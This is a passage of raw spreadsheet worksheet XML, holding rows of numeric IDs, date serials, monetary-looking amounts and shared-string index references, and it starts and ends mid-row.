      </c>
      <c r="H2074">
        <v>5000</v>
      </c>
      <c r="J2074" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="2075" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2075">
        <v>21639</v>
      </c>
      <c r="B2075">
        <v>4809</v>
      </c>
      <c r="C2075" t="s">
        <v>7304</v>
      </c>
      <c r="D2075" t="s">
        <v>11522</v>
      </c>
      <c r="E2075">
        <v>16</v>
      </c>
      <c r="F2075" t="s">
        <v>7564</v>
      </c>
      <c r="G2075" s="1">
        <v>44104</v>
      </c>
      <c r="H2075">
        <v>10000</v>
      </c>
    </row>
    <row r="2076" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2076">
        <v>21640</v>
      </c>
      <c r="B2076">
        <v>4809</v>
      </c>
      <c r="C2076" t="s">
        <v>7304</v>
      </c>
      <c r="D2076" t="s">
        <v>11522</v>
      </c>
      <c r="E2076">
        <v>16</v>
      </c>
      <c r="F2076" t="s">
        <v>547</v>
      </c>
      <c r="G2076" s="1">
        <v>44104</v>
      </c>
      <c r="H2076">
        <v>10000</v>
      </c>
      <c r="J2076" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="2077" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2077">
        <v>21641</v>
      </c>
      <c r="B2077">
        <v>618</v>
      </c>
      <c r="C2077" t="s">
        <v>1719</v>
      </c>
      <c r="D2077" t="s">
        <v>11524</v>
      </c>
      <c r="E2077">
        <v>13</v>
      </c>
      <c r="F2077" t="s">
        <v>10007</v>
      </c>
      <c r="G2077" s="1">
        <v>44091</v>
      </c>
      <c r="H2077">
        <v>969154</v>
      </c>
      <c r="I2077" t="s">
        <v>11525</v>
      </c>
      <c r="J2077" t="s">
        <v>11526</v>
      </c>
    </row>
    <row r="2078" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2078">
        <v>21642</v>
      </c>
      <c r="B2078">
        <v>618</v>
      </c>
      <c r="C2078" t="s">
        <v>1719</v>
      </c>
      <c r="D2078" t="s">
        <v>11524</v>
      </c>
      <c r="E2078">
        <v>13</v>
      </c>
      <c r="F2078" t="s">
        <v>11527</v>
      </c>
      <c r="G2078" s="1">
        <v>44091</v>
      </c>
      <c r="H2078">
        <v>319173</v>
      </c>
      <c r="I2078" t="s">
        <v>11525</v>
      </c>
      <c r="J2078" t="s">
        <v>11528</v>
      </c>
    </row>
    <row r="2079" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2079">
        <v>21644</v>
      </c>
      <c r="B2079">
        <v>618</v>
      </c>
      <c r="C2079" t="s">
        <v>1719</v>
      </c>
      <c r="D2079" t="s">
        <v>11524</v>
      </c>
      <c r="E2079">
        <v>13</v>
      </c>
      <c r="F2079" t="s">
        <v>11529</v>
      </c>
      <c r="G2079" s="1">
        <v>44091</v>
      </c>
      <c r="H2079">
        <v>0</v>
      </c>
    </row>
    <row r="2080" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2080">
        <v>21645</v>
      </c>
      <c r="B2080">
        <v>618</v>
      </c>
      <c r="C2080" t="s">
        <v>1719</v>
      </c>
      <c r="D2080" t="s">
        <v>11524</v>
      </c>
      <c r="E2080">
        <v>13</v>
      </c>
      <c r="F2080" t="s">
        <v>673</v>
      </c>
      <c r="G2080" s="1">
        <v>44091</v>
      </c>
      <c r="H2080">
        <v>0</v>
      </c>
    </row>
    <row r="2081" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2081">
        <v>21646</v>
      </c>
      <c r="B2081">
        <v>2814</v>
      </c>
      <c r="C2081" t="s">
        <v>7321</v>
      </c>
      <c r="D2081" t="s">
        <v>11530</v>
      </c>
      <c r="E2081">
        <v>12</v>
      </c>
      <c r="F2081" t="s">
        <v>9437</v>
      </c>
      <c r="G2081" s="1">
        <v>44116</v>
      </c>
      <c r="H2081">
        <v>20000</v>
      </c>
      <c r="I2081" t="s">
        <v>10031</v>
      </c>
      <c r="J2081" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="2082" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2082">
        <v>21647</v>
      </c>
      <c r="B2082">
        <v>2814</v>
      </c>
      <c r="C2082" t="s">
        <v>7321</v>
      </c>
      <c r="D2082" t="s">
        <v>11530</v>
      </c>
      <c r="E2082">
        <v>12</v>
      </c>
      <c r="F2082" t="s">
        <v>11532</v>
      </c>
      <c r="G2082" s="1">
        <v>44116</v>
      </c>
      <c r="H2082">
        <v>200000</v>
      </c>
      <c r="I2082" t="s">
        <v>11338</v>
      </c>
      <c r="J2082" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="2083" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2083">
        <v>21648</v>
      </c>
      <c r="B2083">
        <v>2814</v>
      </c>
      <c r="C2083" t="s">
        <v>7321</v>
      </c>
      <c r="D2083" t="s">
        <v>11530</v>
      </c>
      <c r="E2083">
        <v>12</v>
      </c>
      <c r="F2083" t="s">
        <v>11227</v>
      </c>
      <c r="G2083" s="1">
        <v>44116</v>
      </c>
      <c r="H2083">
        <v>200000</v>
      </c>
      <c r="I2083" t="s">
        <v>10287</v>
      </c>
      <c r="J2083" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="2084" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2084">
        <v>21649</v>
      </c>
      <c r="B2084">
        <v>2814</v>
      </c>
      <c r="C2084" t="s">
        <v>7321</v>
      </c>
      <c r="D2084" t="s">
        <v>11530</v>
      </c>
      <c r="E2084">
        <v>12</v>
      </c>
      <c r="F2084" t="s">
        <v>9438</v>
      </c>
      <c r="G2084" s="1">
        <v>44116</v>
      </c>
      <c r="H2084">
        <v>20000</v>
      </c>
      <c r="I2084" t="s">
        <v>10287</v>
      </c>
      <c r="J2084" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="2085" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2085">
        <v>21650</v>
      </c>
      <c r="B2085">
        <v>2814</v>
      </c>
      <c r="C2085" t="s">
        <v>7321</v>
      </c>
      <c r="D2085" t="s">
        <v>11530</v>
      </c>
      <c r="E2085">
        <v>12</v>
      </c>
      <c r="F2085" t="s">
        <v>2236</v>
      </c>
      <c r="G2085" s="1">
        <v>44116</v>
      </c>
      <c r="H2085">
        <v>200000</v>
      </c>
      <c r="I2085" t="s">
        <v>10031</v>
      </c>
      <c r="J2085" t="s">
        <v>11531</v>
      </c>
    </row>
    <row r="2086" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2086">
        <v>21651</v>
      </c>
      <c r="B2086">
        <v>4813</v>
      </c>
      <c r="C2086" t="s">
        <v>7250</v>
      </c>
      <c r="D2086" t="s">
        <v>11533</v>
      </c>
      <c r="E2086">
        <v>14</v>
      </c>
      <c r="F2086" t="s">
        <v>9527</v>
      </c>
      <c r="G2086" s="1">
        <v>44137</v>
      </c>
      <c r="H2086">
        <v>200000</v>
      </c>
      <c r="I2086" t="s">
        <v>11534</v>
      </c>
      <c r="J2086" t="s">
        <v>11535</v>
      </c>
    </row>
    <row r="2087" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2087">
        <v>21652</v>
      </c>
      <c r="B2087">
        <v>4813</v>
      </c>
      <c r="C2087" t="s">
        <v>7250</v>
      </c>
      <c r="D2087" t="s">
        <v>11533</v>
      </c>
      <c r="E2087">
        <v>14</v>
      </c>
      <c r="F2087" t="s">
        <v>9217</v>
      </c>
      <c r="G2087" s="1">
        <v>44137</v>
      </c>
      <c r="H2087">
        <v>200000</v>
      </c>
      <c r="I2087" t="s">
        <v>11534</v>
      </c>
      <c r="J2087" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2088" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2088">
        <v>21653</v>
      </c>
      <c r="B2088">
        <v>4813</v>
      </c>
      <c r="C2088" t="s">
        <v>7250</v>
      </c>
      <c r="D2088" t="s">
        <v>11533</v>
      </c>
      <c r="E2088">
        <v>14</v>
      </c>
      <c r="F2088" t="s">
        <v>3814</v>
      </c>
      <c r="G2088" s="1">
        <v>44137</v>
      </c>
      <c r="H2088">
        <v>200000</v>
      </c>
      <c r="I2088" t="s">
        <v>11534</v>
      </c>
      <c r="J2088" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2089" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2089">
        <v>21654</v>
      </c>
      <c r="B2089">
        <v>4813</v>
      </c>
      <c r="C2089" t="s">
        <v>7250</v>
      </c>
      <c r="D2089" t="s">
        <v>11533</v>
      </c>
      <c r="E2089">
        <v>14</v>
      </c>
      <c r="F2089" t="s">
        <v>11537</v>
      </c>
      <c r="G2089" s="1">
        <v>44137</v>
      </c>
      <c r="H2089">
        <v>200000</v>
      </c>
      <c r="I2089" t="s">
        <v>11534</v>
      </c>
      <c r="J2089" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2090" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2090">
        <v>21655</v>
      </c>
      <c r="B2090">
        <v>4813</v>
      </c>
      <c r="C2090" t="s">
        <v>7250</v>
      </c>
      <c r="D2090" t="s">
        <v>11533</v>
      </c>
      <c r="E2090">
        <v>14</v>
      </c>
      <c r="F2090" t="s">
        <v>11538</v>
      </c>
      <c r="G2090" s="1">
        <v>44137</v>
      </c>
      <c r="H2090">
        <v>200000</v>
      </c>
      <c r="I2090" t="s">
        <v>11534</v>
      </c>
      <c r="J2090" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2091" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2091">
        <v>21656</v>
      </c>
      <c r="B2091">
        <v>4813</v>
      </c>
      <c r="C2091" t="s">
        <v>7250</v>
      </c>
      <c r="D2091" t="s">
        <v>11533</v>
      </c>
      <c r="E2091">
        <v>14</v>
      </c>
      <c r="F2091" t="s">
        <v>9437</v>
      </c>
      <c r="G2091" s="1">
        <v>44137</v>
      </c>
      <c r="H2091">
        <v>200000</v>
      </c>
      <c r="I2091" t="s">
        <v>11534</v>
      </c>
      <c r="J2091" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2092" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2092">
        <v>21657</v>
      </c>
      <c r="B2092">
        <v>4813</v>
      </c>
      <c r="C2092" t="s">
        <v>7250</v>
      </c>
      <c r="D2092" t="s">
        <v>11533</v>
      </c>
      <c r="E2092">
        <v>14</v>
      </c>
      <c r="F2092" t="s">
        <v>9523</v>
      </c>
      <c r="G2092" s="1">
        <v>44137</v>
      </c>
      <c r="H2092">
        <v>200000</v>
      </c>
      <c r="I2092" t="s">
        <v>11534</v>
      </c>
      <c r="J2092" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2093" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2093">
        <v>21658</v>
      </c>
      <c r="B2093">
        <v>4813</v>
      </c>
      <c r="C2093" t="s">
        <v>7250</v>
      </c>
      <c r="D2093" t="s">
        <v>11533</v>
      </c>
      <c r="E2093">
        <v>14</v>
      </c>
      <c r="F2093" t="s">
        <v>1746</v>
      </c>
      <c r="G2093" s="1">
        <v>44137</v>
      </c>
      <c r="H2093">
        <v>200000</v>
      </c>
      <c r="I2093" t="s">
        <v>11534</v>
      </c>
      <c r="J2093" t="s">
        <v>11536</v>
      </c>
    </row>
    <row r="2094" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2094">
        <v>21659</v>
      </c>
      <c r="B2094">
        <v>4813</v>
      </c>
      <c r="C2094" t="s">
        <v>7250</v>
      </c>
      <c r="D2094" t="s">
        <v>11533</v>
      </c>
      <c r="E2094">
        <v>14</v>
      </c>
      <c r="F2094" t="s">
        <v>11539</v>
      </c>
      <c r="G2094" s="1">
        <v>44137</v>
      </c>
      <c r="H2094">
        <v>200000</v>
      </c>
      <c r="I2094" t="s">
        <v>11534</v>
      </c>
      <c r="J2094" t="s">
        <v>11540</v>
      </c>
    </row>
    <row r="2095" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2095">
        <v>21660</v>
      </c>
      <c r="B2095">
        <v>4813</v>
      </c>
      <c r="C2095" t="s">
        <v>7250</v>
      </c>
      <c r="D2095" t="s">
        <v>11541</v>
      </c>
      <c r="E2095">
        <v>14</v>
      </c>
      <c r="F2095" t="s">
        <v>11542</v>
      </c>
      <c r="G2095" s="1">
        <v>44137</v>
      </c>
      <c r="H2095">
        <v>200000</v>
      </c>
      <c r="I2095" t="s">
        <v>11534</v>
      </c>
      <c r="J2095" t="s">
        <v>11540</v>
      </c>
    </row>
    <row r="2096" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2096">
        <v>21664</v>
      </c>
      <c r="B2096">
        <v>1691</v>
      </c>
      <c r="C2096" t="s">
        <v>16411</v>
      </c>
      <c r="D2096" t="s">
        <v>16412</v>
      </c>
      <c r="E2096">
        <v>26</v>
      </c>
      <c r="F2096" t="s">
        <v>11543</v>
      </c>
      <c r="G2096" s="1">
        <v>44188</v>
      </c>
      <c r="H2096" s="4">
        <v>150000</v>
      </c>
      <c r="I2096" t="s">
        <v>11544</v>
      </c>
      <c r="J2096" t="s">
        <v>11545</v>
      </c>
    </row>
    <row r="2097" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2097">
        <v>21665</v>
      </c>
      <c r="B2097">
        <v>1691</v>
      </c>
      <c r="C2097" t="s">
        <v>16411</v>
      </c>
      <c r="D2097" t="s">
        <v>16412</v>
      </c>
      <c r="E2097">
        <v>26</v>
      </c>
      <c r="F2097" t="s">
        <v>11546</v>
      </c>
      <c r="G2097" s="1">
        <v>44188</v>
      </c>
      <c r="H2097" s="4">
        <v>200000</v>
      </c>
      <c r="I2097" t="s">
        <v>11544</v>
      </c>
      <c r="J2097" t="s">
        <v>11547</v>
      </c>
    </row>
    <row r="2098" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2098">
        <v>21666</v>
      </c>
      <c r="B2098">
        <v>1691</v>
      </c>
      <c r="C2098" t="s">
        <v>16411</v>
      </c>
      <c r="D2098" t="s">
        <v>16412</v>
      </c>
      <c r="E2098">
        <v>26</v>
      </c>
      <c r="F2098" t="s">
        <v>11027</v>
      </c>
      <c r="G2098" s="1">
        <v>44188</v>
      </c>
      <c r="H2098" s="4">
        <v>300000</v>
      </c>
      <c r="I2098" t="s">
        <v>11548</v>
      </c>
      <c r="J2098" t="s">
        <v>11549</v>
      </c>
    </row>
    <row r="2099" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2099">
        <v>21667</v>
      </c>
      <c r="B2099">
        <v>1691</v>
      </c>
      <c r="C2099" t="s">
        <v>2588</v>
      </c>
      <c r="D2099" t="s">
        <v>9830</v>
      </c>
      <c r="E2099">
        <v>26</v>
      </c>
      <c r="F2099" t="s">
        <v>609</v>
      </c>
      <c r="G2099" s="1">
        <v>44188</v>
      </c>
      <c r="H2099">
        <v>150000</v>
      </c>
      <c r="I2099" t="s">
        <v>11550</v>
      </c>
      <c r="J2099" t="s">
        <v>11551</v>
      </c>
    </row>
    <row r="2100" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2100">
        <v>21668</v>
      </c>
      <c r="B2100">
        <v>1691</v>
      </c>
      <c r="C2100" t="s">
        <v>2588</v>
      </c>
      <c r="D2100" t="s">
        <v>9830</v>
      </c>
      <c r="E2100">
        <v>26</v>
      </c>
      <c r="F2100" t="s">
        <v>9673</v>
      </c>
      <c r="G2100" s="1">
        <v>44188</v>
      </c>
      <c r="H2100">
        <v>150000</v>
      </c>
      <c r="I2100" t="s">
        <v>11552</v>
      </c>
      <c r="J2100" t="s">
        <v>11549</v>
      </c>
    </row>
    <row r="2101" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2101">
        <v>21669</v>
      </c>
      <c r="B2101">
        <v>679</v>
      </c>
      <c r="C2101" t="s">
        <v>1706</v>
      </c>
      <c r="D2101" t="s">
        <v>11553</v>
      </c>
      <c r="E2101">
        <v>26</v>
      </c>
      <c r="F2101" t="s">
        <v>547</v>
      </c>
      <c r="G2101" s="1">
        <v>44116</v>
      </c>
      <c r="H2101">
        <v>10000</v>
      </c>
      <c r="J2101" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2102" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2102">
        <v>21670</v>
      </c>
      <c r="B2102">
        <v>679</v>
      </c>
      <c r="C2102" t="s">
        <v>1706</v>
      </c>
      <c r="D2102" t="s">
        <v>11553</v>
      </c>
      <c r="E2102">
        <v>26</v>
      </c>
      <c r="F2102" t="s">
        <v>11554</v>
      </c>
      <c r="G2102" s="1">
        <v>44116</v>
      </c>
      <c r="H2102">
        <v>5000</v>
      </c>
      <c r="J2102" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2103" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2103">
        <v>21671</v>
      </c>
      <c r="B2103">
        <v>679</v>
      </c>
      <c r="C2103" t="s">
        <v>1706</v>
      </c>
      <c r="D2103" t="s">
        <v>11553</v>
      </c>
      <c r="E2103">
        <v>26</v>
      </c>
      <c r="F2103" t="s">
        <v>3499</v>
      </c>
      <c r="G2103" s="1">
        <v>44116</v>
      </c>
      <c r="H2103">
        <v>10000</v>
      </c>
      <c r="J2103" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2104" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2104">
        <v>21672</v>
      </c>
      <c r="B2104">
        <v>679</v>
      </c>
      <c r="C2104" t="s">
        <v>1706</v>
      </c>
      <c r="D2104" t="s">
        <v>11553</v>
      </c>
      <c r="E2104">
        <v>26</v>
      </c>
      <c r="F2104" t="s">
        <v>9453</v>
      </c>
      <c r="G2104" s="1">
        <v>44116</v>
      </c>
      <c r="H2104">
        <v>5000</v>
      </c>
      <c r="J2104" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2105" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2105">
        <v>21673</v>
      </c>
      <c r="B2105">
        <v>679</v>
      </c>
      <c r="C2105" t="s">
        <v>1706</v>
      </c>
      <c r="D2105" t="s">
        <v>11553</v>
      </c>
      <c r="E2105">
        <v>26</v>
      </c>
      <c r="F2105" t="s">
        <v>364</v>
      </c>
      <c r="G2105" s="1">
        <v>44116</v>
      </c>
      <c r="H2105">
        <v>5000</v>
      </c>
      <c r="J2105" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2106" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2106">
        <v>21674</v>
      </c>
      <c r="B2106">
        <v>679</v>
      </c>
      <c r="C2106" t="s">
        <v>1706</v>
      </c>
      <c r="D2106" t="s">
        <v>11553</v>
      </c>
      <c r="E2106">
        <v>26</v>
      </c>
      <c r="F2106" t="s">
        <v>3204</v>
      </c>
      <c r="G2106" s="1">
        <v>44116</v>
      </c>
      <c r="H2106">
        <v>1000</v>
      </c>
      <c r="J2106" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="2107" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2107">
        <v>21677</v>
      </c>
      <c r="B2107">
        <v>4834</v>
      </c>
      <c r="C2107" t="s">
        <v>7329</v>
      </c>
      <c r="D2107" t="s">
        <v>11555</v>
      </c>
      <c r="E2107">
        <v>12</v>
      </c>
      <c r="F2107" t="s">
        <v>9469</v>
      </c>
      <c r="G2107" s="1">
        <v>44081</v>
      </c>
      <c r="H2107">
        <v>1200000</v>
      </c>
      <c r="I2107" t="s">
        <v>11556</v>
      </c>
    </row>
    <row r="2108" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2108">
        <v>21678</v>
      </c>
      <c r="B2108">
        <v>460</v>
      </c>
      <c r="C2108" t="s">
        <v>1768</v>
      </c>
      <c r="D2108" t="s">
        <v>11557</v>
      </c>
      <c r="E2108">
        <v>29</v>
      </c>
      <c r="F2108" t="s">
        <v>11558</v>
      </c>
      <c r="G2108" s="1">
        <v>44048</v>
      </c>
      <c r="H2108">
        <v>500000</v>
      </c>
      <c r="I2108" t="s">
        <v>9550</v>
      </c>
      <c r="J2108" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2109" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2109">
        <v>21679</v>
      </c>
      <c r="B2109">
        <v>4834</v>
      </c>
      <c r="C2109" t="s">
        <v>7329</v>
      </c>
      <c r="D2109" t="s">
        <v>11555</v>
      </c>
      <c r="E2109">
        <v>12</v>
      </c>
      <c r="F2109" t="s">
        <v>11559</v>
      </c>
      <c r="G2109" s="1">
        <v>44081</v>
      </c>
      <c r="H2109">
        <v>1200000</v>
      </c>
      <c r="I2109" t="s">
        <v>11560</v>
      </c>
    </row>
    <row r="2110" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2110">
        <v>21686</v>
      </c>
      <c r="B2110">
        <v>618</v>
      </c>
      <c r="C2110" t="s">
        <v>1719</v>
      </c>
      <c r="D2110" t="s">
        <v>11524</v>
      </c>
      <c r="E2110">
        <v>13</v>
      </c>
      <c r="F2110" t="s">
        <v>11332</v>
      </c>
      <c r="G2110" s="1">
        <v>44091</v>
      </c>
      <c r="H2110">
        <v>0</v>
      </c>
      <c r="I2110" t="s">
        <v>9985</v>
      </c>
    </row>
    <row r="2111" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2111">
        <v>21687</v>
      </c>
      <c r="B2111">
        <v>618</v>
      </c>
      <c r="C2111" t="s">
        <v>1719</v>
      </c>
      <c r="D2111" t="s">
        <v>11524</v>
      </c>
      <c r="E2111">
        <v>13</v>
      </c>
      <c r="F2111" t="s">
        <v>9441</v>
      </c>
      <c r="G2111" s="1">
        <v>44091</v>
      </c>
      <c r="H2111">
        <v>0</v>
      </c>
      <c r="J2111" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2112" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2112">
        <v>21688</v>
      </c>
      <c r="B2112">
        <v>618</v>
      </c>
      <c r="C2112" t="s">
        <v>1719</v>
      </c>
      <c r="D2112" t="s">
        <v>11524</v>
      </c>
      <c r="E2112">
        <v>13</v>
      </c>
      <c r="F2112" t="s">
        <v>11561</v>
      </c>
      <c r="G2112" s="1">
        <v>44091</v>
      </c>
      <c r="H2112">
        <v>1403802</v>
      </c>
      <c r="I2112" t="s">
        <v>11562</v>
      </c>
      <c r="J2112" t="s">
        <v>11563</v>
      </c>
    </row>
    <row r="2113" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2113">
        <v>21691</v>
      </c>
      <c r="B2113">
        <v>352</v>
      </c>
      <c r="C2113" t="s">
        <v>1527</v>
      </c>
      <c r="D2113" t="s">
        <v>11564</v>
      </c>
      <c r="E2113">
        <v>13</v>
      </c>
      <c r="F2113" t="s">
        <v>11565</v>
      </c>
      <c r="G2113" s="1">
        <v>44067</v>
      </c>
      <c r="H2113">
        <v>924000</v>
      </c>
      <c r="J2113" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2114" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2114">
        <v>21692</v>
      </c>
      <c r="B2114">
        <v>352</v>
      </c>
      <c r="C2114" t="s">
        <v>1527</v>
      </c>
      <c r="D2114" t="s">
        <v>11564</v>
      </c>
      <c r="E2114">
        <v>13</v>
      </c>
      <c r="F2114" t="s">
        <v>11566</v>
      </c>
      <c r="G2114" s="1">
        <v>44067</v>
      </c>
      <c r="H2114">
        <v>10000</v>
      </c>
      <c r="J2114" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2115" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2115">
        <v>21693</v>
      </c>
      <c r="B2115">
        <v>352</v>
      </c>
      <c r="C2115" t="s">
        <v>1527</v>
      </c>
      <c r="D2115" t="s">
        <v>11564</v>
      </c>
      <c r="E2115">
        <v>13</v>
      </c>
      <c r="F2115" t="s">
        <v>11567</v>
      </c>
      <c r="G2115" s="1">
        <v>44067</v>
      </c>
      <c r="H2115">
        <v>924000</v>
      </c>
      <c r="J2115" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2116" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2116">
        <v>21694</v>
      </c>
      <c r="B2116">
        <v>352</v>
      </c>
      <c r="C2116" t="s">
        <v>1527</v>
      </c>
      <c r="D2116" t="s">
        <v>11564</v>
      </c>
      <c r="E2116">
        <v>13</v>
      </c>
      <c r="F2116" t="s">
        <v>11568</v>
      </c>
      <c r="G2116" s="1">
        <v>44067</v>
      </c>
      <c r="H2116">
        <v>16000</v>
      </c>
      <c r="J2116" t="s">
        <v>11569</v>
      </c>
    </row>
    <row r="2117" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2117">
        <v>21695</v>
      </c>
      <c r="B2117">
        <v>352</v>
      </c>
      <c r="C2117" t="s">
        <v>1527</v>
      </c>
      <c r="D2117" t="s">
        <v>11564</v>
      </c>
      <c r="E2117">
        <v>13</v>
      </c>
      <c r="F2117" t="s">
        <v>11570</v>
      </c>
      <c r="G2117" s="1">
        <v>44067</v>
      </c>
      <c r="H2117">
        <v>270000</v>
      </c>
      <c r="J2117" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2118" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2118">
        <v>21696</v>
      </c>
      <c r="B2118">
        <v>352</v>
      </c>
      <c r="C2118" t="s">
        <v>1527</v>
      </c>
      <c r="D2118" t="s">
        <v>11564</v>
      </c>
      <c r="E2118">
        <v>13</v>
      </c>
      <c r="F2118" t="s">
        <v>11571</v>
      </c>
      <c r="G2118" s="1">
        <v>44067</v>
      </c>
      <c r="H2118">
        <v>155000</v>
      </c>
      <c r="J2118" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="2119" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2119">
        <v>21697</v>
      </c>
      <c r="B2119">
        <v>352</v>
      </c>
      <c r="C2119" t="s">
        <v>1527</v>
      </c>
      <c r="D2119" t="s">
        <v>11564</v>
      </c>
      <c r="E2119">
        <v>13</v>
      </c>
      <c r="F2119" t="s">
        <v>11572</v>
      </c>
      <c r="G2119" s="1">
        <v>44067</v>
      </c>
      <c r="H2119">
        <v>270000</v>
      </c>
      <c r="J2119" t="s">
        <v>11569</v>
      </c>
    </row>
    <row r="2120" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2120">
        <v>21704</v>
      </c>
      <c r="B2120">
        <v>297</v>
      </c>
      <c r="C2120" t="s">
        <v>1467</v>
      </c>
      <c r="D2120" t="s">
        <v>11573</v>
      </c>
      <c r="E2120">
        <v>27</v>
      </c>
      <c r="F2120" t="s">
        <v>9900</v>
      </c>
      <c r="G2120" s="1">
        <v>44071</v>
      </c>
      <c r="H2120">
        <v>125000</v>
      </c>
      <c r="I2120" t="s">
        <v>10409</v>
      </c>
      <c r="J2120" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2121" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2121">
        <v>21705</v>
      </c>
      <c r="B2121">
        <v>297</v>
      </c>
      <c r="C2121" t="s">
        <v>1467</v>
      </c>
      <c r="D2121" t="s">
        <v>11573</v>
      </c>
      <c r="E2121">
        <v>27</v>
      </c>
      <c r="F2121" t="s">
        <v>3763</v>
      </c>
      <c r="G2121" s="1">
        <v>44071</v>
      </c>
      <c r="H2121">
        <v>55250</v>
      </c>
      <c r="I2121" t="s">
        <v>10409</v>
      </c>
      <c r="J2121" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2122" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2122">
        <v>21706</v>
      </c>
      <c r="B2122">
        <v>297</v>
      </c>
      <c r="C2122" t="s">
        <v>1467</v>
      </c>
      <c r="D2122" t="s">
        <v>11573</v>
      </c>
      <c r="E2122">
        <v>27</v>
      </c>
      <c r="F2122" t="s">
        <v>11574</v>
      </c>
      <c r="G2122" s="1">
        <v>44071</v>
      </c>
      <c r="H2122">
        <v>45250</v>
      </c>
      <c r="I2122" t="s">
        <v>10409</v>
      </c>
      <c r="J2122" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2123" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2123">
        <v>21707</v>
      </c>
      <c r="B2123">
        <v>826</v>
      </c>
      <c r="C2123" t="s">
        <v>1552</v>
      </c>
      <c r="D2123" t="s">
        <v>11438</v>
      </c>
      <c r="E2123">
        <v>14</v>
      </c>
      <c r="F2123" t="s">
        <v>3076</v>
      </c>
      <c r="G2123" s="1">
        <v>44098</v>
      </c>
      <c r="H2123">
        <v>25000000</v>
      </c>
      <c r="I2123" t="s">
        <v>11575</v>
      </c>
      <c r="J2123" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="2124" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2124">
        <v>21708</v>
      </c>
      <c r="B2124">
        <v>2719</v>
      </c>
      <c r="C2124" t="s">
        <v>6860</v>
      </c>
      <c r="D2124" t="s">
        <v>10823</v>
      </c>
      <c r="E2124">
        <v>13</v>
      </c>
      <c r="F2124" t="s">
        <v>9925</v>
      </c>
      <c r="G2124" s="1">
        <v>44050</v>
      </c>
      <c r="H2124">
        <v>0</v>
      </c>
      <c r="J2124" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="2125" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A2125">
        <v>21712</v>
      </c>
      <c r="B2125">
        <v>701</v>
      </c>
      <c r="C2125" t="s">
        <v>1775</v>
      </c>
      <c r="D2125" t="s">
        <v>11576</v>
      </c>
      <c r="E2125">
        <v>11</v>
      </c>
      <c r="F2125" t="s">
        <v>11577</v>
      </c>
      <c r="G2125" s="1">
        <v>44210</v>
      </c>
      <c r="H2125">
